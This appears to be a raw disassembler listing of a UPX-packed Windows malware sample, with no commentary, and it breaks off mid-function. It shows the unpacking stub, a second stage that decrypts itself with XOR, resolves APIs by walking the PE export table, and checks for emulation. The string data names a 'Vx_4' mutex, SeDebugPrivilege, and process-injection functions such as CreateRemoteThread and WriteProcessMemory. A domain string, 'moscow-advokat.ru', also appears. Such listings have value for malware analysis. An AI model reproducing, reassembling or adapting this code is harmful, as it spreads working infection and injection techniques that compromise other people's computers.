dd 6DBB9E73h, 66EE7694h, 9C6D672Fh, 6C2FF62Ah, 632463C9h
dd 7974690Ah, 6E614D20h, 58C5E91Eh, 31C91AB1h, 0C59DB48Ch
dd 5234D376h, 80E4153h, 0FFFFEFBCh, 0A4C11BFFh, 0DD499F8Eh
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 0EDFFFFFFh, 8C9AC3F2h, 0CC4D8556h, 0D3AD0FE1h, 37691506h
dd 98A8FD8Dh, 0CE700B16h, 1445504Fh, 0F837FFFFh, 0EF324A39h
dd 0D847AEE3h, 0BA84DFBDh, 7380371Eh, 0DF58B81h, 92E07D4Ah
dd 0E8DFFFFFh, 0B8C52DFEh, 85E020C6h, 5068BD9Ch, 50B6296Ah
dd 42C33482h, 9808117Fh, 0FFFFFFFFh, 0E7B7B21Ch, 77899D9Ch
dd 0D3971A3Dh, 8D5029A4h, 463A96A5h, 12E8FC8Dh, 0AF10EB16h
dd 0F8457044h, 0FFFFFFEAh, 78966AD0h
dd 51439FB1h, 86A827EBh, 98A3970h, 0A1C214DEh, 167A53C1h
dd 9785C4BFh, 0A0DFA378h, 9829E70Fh, 53899E9Eh, 940724FEh
dd 0FFFFFFFFh, 75A3ECCAh, 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh
dd 873969D7h, 7B948C1Ah, 821318C6h, 4BBF3EB3h, 0F02FFFFFh
dd 0EB67E042h, 60B737B2h, 0D7D8B3AAh, 65048022h, 0FF4BA67Ah
dd 45855886h, 0FC1BFFA6h, 0EEF96EF6h, 3290C956h, 0B7A63B4Ah
dd 0EBD3D87Ah, 97EE4263h, 0F7041888h, 31505FE8h, 0A69A03CCh
dd 98B49A69h, 2C3C5878h, 69B2CD34h, 0DC5EF814h, 34D3B4CCh
dd 90A4D34Dh, 0B607480h, 7142E96Dh, 5B6D2E9Fh, 6CDC0575h
dd 0A7685B24h, 0B700492Eh, 96B60D64h, 6BC52C2Dh, 611C67ADh
dd 0DB01F06Eh, 2C7586D8h, 7A6F2F72h, 70DB7962h, 41D9ACBCh
dd 0A4147262h, 0AD600C79h, 58796C25h, 0D6674A38h, 0CA6B46F1h
dd 732E61B6h, 84277578h, 6EC73A36h, 3D2E1646h, 6D80B067h
dd 2FCA468Eh, 51C6C28h, 6734BB7Bh, 116F701Ah, 13617A2Eh
dd 0CF1B66C3h, 61FE3309h, 401A5F13h, 676F8E6Eh, 776B7543h
dd 675DBD90h, 1F74D85Eh, 1FA56364h, 0FCA9EB59h, 2D736F6Ch
dd 0A72E5861h, 6BADB220h, 0AB75E35Bh, 0BE62166Ch, 0B6BB253Dh
dd 7266B92Fh, 4A616C66h, 0EEC09FEh, 61726733h, 74612E7Ah
dd 6D0B8180h, 7736876Dh, 7DBBDA2Dh, 1EE5AE6Ah, 6362CB75h
dd 0BF676621h, 7FDB0BEAh, 6D6C6B6Ah, 71706F6Eh, 77927452h
dd 0DA7A7978h, 0F95FFE58h, 44434241h, 48474645h, 4E4B4A49h
dd 7B5751FCh, 544058A1h, 5A59581Ah, 0F5ADB81Bh, 77A08152h
dd 0B62A2038h, 2140E907h, 0FF8C6702h, 0F60C4BCBh, 4B43CA56h
dd 26501320h, 0F66E9553h, 4E4F0B64h, 490B0A47h, 0FA5DAC3Fh
dd 92353407h, 2F0C4F4Ah, 54495551h, 24816B6Fh, 477B561Ah
dd 0B6E5F766h, 74231163h, 841779B5h, 0C0E0075Fh, 20A202CBh
dd 0BED6F328h, 6203E85Dh, 34203B64h, 36204549h, 0B060915h
dd 0B41EAC30h, 70164035h, 29EC5Fh, 371776Bh, 0CEBA2C61h
dd 4D02E6B5h, 690F075Ch, 8127C03h, 2D6569B7h, 0A6C71331h
dd 0C48A08BBh, 0FFEE4009h, 6C01FF97h, 63727473h, 4741706Dh
dd 6F4C7465h, 656C6163h, 6F666E49h, 56715B0Fh, 44525394h
dd 452E6309h, 797F14B7h, 65595715h, 588A4746h, 9E303483h
dd 0BD9A6954h, 0E6DB997h, 206F540Bh, 0ED65A015h, 4146000Ch
dd 3C42BF0Ch, 4D3F0DF6h, 2DAC646Fh, 0B016614Eh, 8E412D93h
dd 7E5E4169h, 6F40AEFh, 4309DF1Fh, 1E79706Fh, 387BFEE4h
dd 456E6993h, 81516578h, 0ED06FFF6h, 9A6C6F7Eh, 53323370h
dd 7370616Eh, 19746F68h, 0A0CDADDDh, 723212D3h, 5540F73h
dd 0C641AD73h, 0F6182C35h, 2180FB06h, 7478654Eh, 54727068h
dd 7867CB6Ch, 0FF087645h, 538B4661h, 42B7B9B1h, 624F7BE4h
dd 4414996Ah, 0A136796h, 4CB715CFh, 0CAC94561h, 263A15ADh
dd 6378452Fh, 7B61DBB2h, 5C6E2354h, 65706506h, 5F092C97h
dd 2E6E4711h, 0D8A06F12h, 64410B3Fh, 140F7264h, 7262694Ch
dd 84B60C28h, 4D2B8961h, 8DC4625h, 5FAB1F67h, 100E4865h
dd 9F874496h, 0C2E16CCBh, 701D166Ch, 476B63A2h, 6D61D12Dh
dd 4DE57275h, 366C78DFh, 0C4F39289h, 45986A0Dh, 0E193198h
dd 7B0E8162h, 31E91943h, 0DB639249h, 6BE48376h, 630A6465h
dd 522D6D13h, 70C9785Dh, 45083A1Bh, 0C426657Ah, 3D5E8613h
dd 5868D100h, 15EECDA1h, 1A747079h, 710C4B2h, 0A2FB6CDh
dd 0E611244h, 0C3057BECh, 79666976h, 3CCA6746h, 0B7B016D5h
dd 578F10A1h, 112C796Fh, 0BEC1866Dh, 1079654Bh, 651EB252h
dd 178763F9h, 4114EF3Eh, 69757163h, 871A1672h, 8F494D0Dh
dd 0B9B6745Ch, 0C13AF759h, 0EF0D9267h, 3B0E1041h, 3E0D2194h
dd 90EC510Fh, 350AD6B0h, 98302511h, 2D0466C5h, 0E19E1021h
dd 5FB5458Eh, 0F5696241h, 0C34D6853h, 0AF8B1446h, 0F8DE136Eh
dd 3B77E5DDh, 5696F78h, 69736E61h, 0B6EF6304h, 736FCBF6h
dd 5F48455Fh, 6744DC70h, 78435F0Bh, 98263878h, 0E74C6C4Ah
dd 83936B81h, 768627Dh, 2A427970h, 9A15BB3Bh, 5FDDCFE2h
dd 29332868h, 1CD7399Bh, 11727473h, 5B49060Dh, 6D6C31CCh
dd 0AC0FBA36h, 0D9B6B774h, 3CE9946Ch, 7C737701h, 1966748Bh
dd 5219A682h, 5639651Bh, 3AA29168h, 0BD8146Fh, 1B366331h
dd 0C7290B21h, 5383B669h, 0F44F6449h, 0F6D83B50h, 35A78AE0h
dd 11417355h, 5B01196Ch, 1B114E0Eh, 5D3706A6h, 77936EBBh
dd 0C5D55753h, 525574A2h, 0B2CBA564h, 2125B2Ch, 0D027308h
dd 0B2CB2C01h, 0B6F392Ch, 2CB21734h, 90CB2CBh, 54101304h
dd 16CA00CFh, 46455057h, 2FA025F5h, 0D3275DB7h, 9ACF0340h
dd 0F001FEDh, 6010B01h, 1312340Ch, 98D81D18h, 30E5017Bh
dd 0DD0B3135h, 2C0092Ch, 700C076Bh, 25B99D81h, 710341Eh
dd 0B258E58Ah, 3B680306h, 176C28Ch, 0B0647FC2h, 53581E01h
dd 42EBA75h, 0C1903303h, 34360608h, 0C837C0C4h, 0E004F4EDh
dd 0FB90642Eh, 271211CDh, 48586E0Ah, 0C03838h, 61800060h
dd 33D205Bh, 1962Ch, 0
dd 0FF2000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset aMoscowAdvokat_ ; "moscow-advokat.ru"
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508422
; ---------------------------------------------------------------------------
align 8
loc_31508418: ; CODE XREF: UPX1:loc_31508429�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150841E: ; CODE XREF: UPX1:315084B6�j
; UPX1:315084CD�j
add ebx, ebx
jnz short loc_31508429
loc_31508422: ; CODE XREF: UPX1:31508410�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508429: ; CODE XREF: UPX1:31508420�j
jb short loc_31508418
mov eax, 1
loc_31508430: ; CODE XREF: UPX1:3150843F�j
; UPX1:3150844A�j
add ebx, ebx
jnz short loc_3150843B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150843B: ; CODE XREF: UPX1:31508432�j
adc eax, eax
add ebx, ebx
jnb short loc_31508430
jnz short loc_3150844C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508430
loc_3150844C: ; CODE XREF: UPX1:31508441�j
xor ecx, ecx
sub eax, 3
jb short loc_31508460
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084D2
mov ebp, eax
loc_31508460: ; CODE XREF: UPX1:31508451�j
add ebx, ebx
jnz short loc_3150846B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150846B: ; CODE XREF: UPX1:31508462�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
jnz short loc_3150849C
inc ecx
loc_3150847D: ; CODE XREF: UPX1:3150848C�j
; UPX1:31508497�j
add ebx, ebx
jnz short loc_31508488
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508488: ; CODE XREF: UPX1:3150847F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150847D
jnz short loc_31508499
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150847D
loc_31508499: ; CODE XREF: UPX1:3150848E�j
add ecx, 2
loc_3150849C: ; CODE XREF: UPX1:3150847A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084BC
loc_315084AD: ; CODE XREF: UPX1:315084B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_315084AD
jmp loc_3150841E
; ---------------------------------------------------------------------------
align 4
loc_315084BC: ; CODE XREF: UPX1:315084AB�j
; UPX1:315084C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084BC
add edi, ecx
jmp loc_3150841E
; ---------------------------------------------------------------------------
loc_315084D2: ; CODE XREF: UPX1:3150845C�j
pop esi
mov edi, esi
mov ecx, 0CAh
loc_315084DA: ; CODE XREF: UPX1:315084E1�j
; UPX1:315084E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084DF: ; CODE XREF: UPX1:31508504�j
cmp al, 1
ja short loc_315084DA
cmp byte ptr [edi], 1
jnz short loc_315084DA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084DF
lea edi, [esi+6000h]
loc_3150850C: ; CODE XREF: UPX1:3150852E�j
mov eax, [edi]
or eax, eax
jz short loc_31508557
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508529: ; CODE XREF: UPX1:3150854F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3150850C
mov ecx, edi
jns short near ptr loc_3150853A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150853A: ; CODE XREF: UPX1:31508532�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508551
mov [ebx], eax
add ebx, 4
jmp short loc_31508529
; ---------------------------------------------------------------------------
loc_31508551: ; CODE XREF: UPX1:31508548�j
call dword ptr [esi+8094h]
loc_31508557: ; CODE XREF: UPX1:31508510�j
popa
jmp loc_31501D18
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 0001A000 ( 106496.)
; Section size in file : 0001A000 ( 106496.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h
dword_31509090 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_315159F2+50�r ...
dd 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C4D444h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h
dword_31509218 dd 40B60F30h ; ---------------------------------------------------------------------------
add al, [ebx+3C7500F8h]
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3150924D: ; CODE XREF: UPX2:3150925C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3150924D
retn
; ---------------------------------------------------------------------------
db 2Bh
dd 30FF64C0h, 0B8208964h, 12345678h, 60000387h, 84000000h
dd 0
dd 26003150h, 500000h, 760h dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_3150B04D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_3150B041
mov ebx, [eax+29C1h]
jmp short loc_3150B04B
; ---------------------------------------------------------------------------
loc_3150B041: ; CODE XREF: UPX2:3150B037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_3150B04B: ; CODE XREF: UPX2:3150B03F�j
mov ebx, [ebx]
loc_3150B04D: ; CODE XREF: UPX2:3150B01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0F9h
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3150B07B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3150B07B: ; CODE XREF: UPX2:3150B074�j
and ebx, 0FFFFF000h
loc_3150B081: ; CODE XREF: UPX2:3150B090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3150B092
loc_3150B08A: ; CODE XREF: UPX2:3150B09F�j
sub ebx, 100h
jnz short loc_3150B081
loc_3150B092: ; CODE XREF: UPX2:3150B088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3150B08A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3150B0AC: ; CODE XREF: UPX2:loc_3150B0C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3150B0C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3150B0C5
loc_3150B0C0: ; CODE XREF: UPX2:3150B0B5�j
loop loc_3150B0AC
pop ecx
jmp short loc_3150B0F0
; ---------------------------------------------------------------------------
loc_3150B0C5: ; CODE XREF: UPX2:3150B0BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3150B137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B17E
loc_3150B0F0: ; CODE XREF: UPX2:3150B0C3�j
; sub_3150B17E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_3150B11C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_3150B11C: ; CODE XREF: sub_3150B17E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3150B17E
; ---------------------------------------------------------------------------
dw 0D9EDh
; =============== S U B R O U T I N E =======================================
sub_3150B120 proc near ; CODE XREF: sub_3150D45B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_3150B128: ; CODE XREF: sub_3150B120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3150B128
pop ebx
retn
sub_3150B120 endp
; ---------------------------------------------------------------------------
loc_3150B137: ; CODE XREF: UPX2:3150B0EE�j
call near ptr loc_3150B146+2
inc ebx
insb
outsd
jnb short near ptr loc_3150B1A3+3
dec eax
popa
outsb
db 64h
insb
loc_3150B146: ; CODE XREF: UPX2:loc_3150B137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_3150B162+1
inc ebx
jb short loc_3150B1BE
popa
jz short near ptr loc_3150B1C0+1
inc ebp
jbe short near ptr loc_3150B1C0+4
outsb
jz short loc_3150B1A3
loc_3150B162: ; CODE XREF: UPX2:3150B151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3150B17E
inc edi
db 65h
jz short near ptr loc_3150B1C0+1
popa
jnb short near ptr loc_3150B1EA+2
inc ebp
jb short near ptr loc_3150B1EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3150B17E proc near ; CODE XREF: UPX2:3150B16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 3150B0F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3150B534 SIZE 0000000B BYTES
push ebx
call esi ; rand
mov [ebp+103E6Ah], eax
call sub_3150B55F
test eax, eax
jz loc_3150B0F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_3150B534
loc_3150B1A3: ; CODE XREF: UPX2:3150B160�j
; UPX2:3150B13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_3150B1C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_3150B1BE: ; CODE XREF: UPX2:3150B157�j
jmp short loc_3150B1C7
; ---------------------------------------------------------------------------
loc_3150B1C0: ; CODE XREF: sub_3150B17E+2C�j
; UPX2:3150B15A�j ...
and dword ptr [ebp+101598h], 0
loc_3150B1C7: ; CODE XREF: sub_3150B17E:loc_3150B1BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_3150B1EA: ; CODE XREF: UPX2:3150B176�j
; UPX2:3150B179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3150B59C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_3150B2E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_3150B534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_3150B534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3150B534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_3150B2D3
jmp loc_3150B534
; ---------------------------------------------------------------------------
loc_3150B2D3: ; CODE XREF: sub_3150B17E+14B�p
; sub_3150B17E+162�j
push 0
pop ecx
jecxz short locret_3150B2E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_3150B2D3
; ---------------------------------------------------------------------------
locret_3150B2E2: ; CODE XREF: sub_3150B17E+158�j
retn
; ---------------------------------------------------------------------------
loc_3150B2E3: ; CODE XREF: sub_3150B17E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_3150B534
call near ptr loc_3150B2FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3150B2FA: ; CODE XREF: sub_3150B17E+172�p
add bh, bh
sub_3150B17E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3150B59C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_3150B534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_3150B534
mov ecx, [ebp+103F06h]
jecxz short loc_3150B383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_3150B383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_3150B383: ; CODE XREF: UPX2:3150B367�j
; UPX2:3150B378�j
call sub_3150B540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_3150B3CC: ; CODE XREF: UPX2:3150B3D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_3150B3CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_3150B534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B17E
loc_3150B534: ; CODE XREF: sub_3150B17E+1F�j
; sub_3150B17E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_3150B0F0
; END OF FUNCTION CHUNK FOR sub_3150B17E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_3150B540 proc near ; CODE XREF: UPX2:loc_3150B383�p
; sub_3150B55F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_3150B540 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3150B55F proc near ; CODE XREF: sub_3150B17E+9�p
xor ecx, ecx
call sub_3150B540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_3150B55F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 1, 2 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3150B59C proc near ; CODE XREF: sub_3150B17E+7C�p
; UPX2:3150B312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_3150B5A7: ; CODE XREF: sub_3150B59C+E�j
lodsb
test al, al
jnz short loc_3150B5A7
loop sub_3150B59C
retn
sub_3150B59C endp
; =============== S U B R O U T I N E =======================================
sub_3150B5AF proc near ; CODE XREF: sub_3150D12D+25�p
; FUNCTION CHUNK AT 3150B639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 3150BA09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_3150B5DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_3150B639
jbe short near ptr loc_3150B639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_3150B640
inc ecx
loc_3150B5DC: ; CODE XREF: sub_3150B5AF+13�p
add [eax-1], dl
sub_3150B5AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B5AF
loc_3150B639: ; CODE XREF: sub_3150B5AF+1F�j
; sub_3150B5AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3150B6A3+2
loc_3150B640: ; CODE XREF: sub_3150B5AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_3150B6AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3150B6B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3150B6C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_3150B6E1+1
push 4500746Fh
js short loc_3150B6DF
jz short near ptr loc_3150B6CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_3150B700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
